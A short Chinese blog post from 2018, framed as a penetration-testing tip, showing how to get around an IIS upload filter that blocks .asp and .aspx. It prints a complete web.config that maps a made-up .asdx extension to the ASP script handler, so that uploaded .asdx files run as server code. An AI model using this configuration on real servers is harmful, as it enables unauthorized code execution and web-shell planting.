web.config中使asdx解析
首页 > web安全 > 小技巧    作者:webbaozi   2018年6月13日 19:59 星期三   热度:372°   百度已收录  
时间:2018-6-13 19:59   热度:372° 

在渗透测试中有时会遇见可以上传任意文件,但是过滤了asp,aspx等后缀。

这里使用上传web.config文件来控制解析后缀,代码如下:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <system.webServer>
        <directoryBrowse enabled="true" />
        <handlers>
            <add name="asdx" path="*.asdx" verb="GET,HEAD,POST,DEBUG" 
            modules="IsapiModule"                        
            scriptProcessor="%windir%\System32\inetsrv\asp.dll"
            resourceType="Unspecified" 
            requireAccess="Script" />
        </handlers>
    </system.webServer>
</configuration>

这样在上传一个.asdx的后缀即可被解析。

二维码加载中...
本文作者:webbaozi      文章标题: web.config中使asdx解析
本文地址:http://www.webbaozi.com/qjyq/95.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1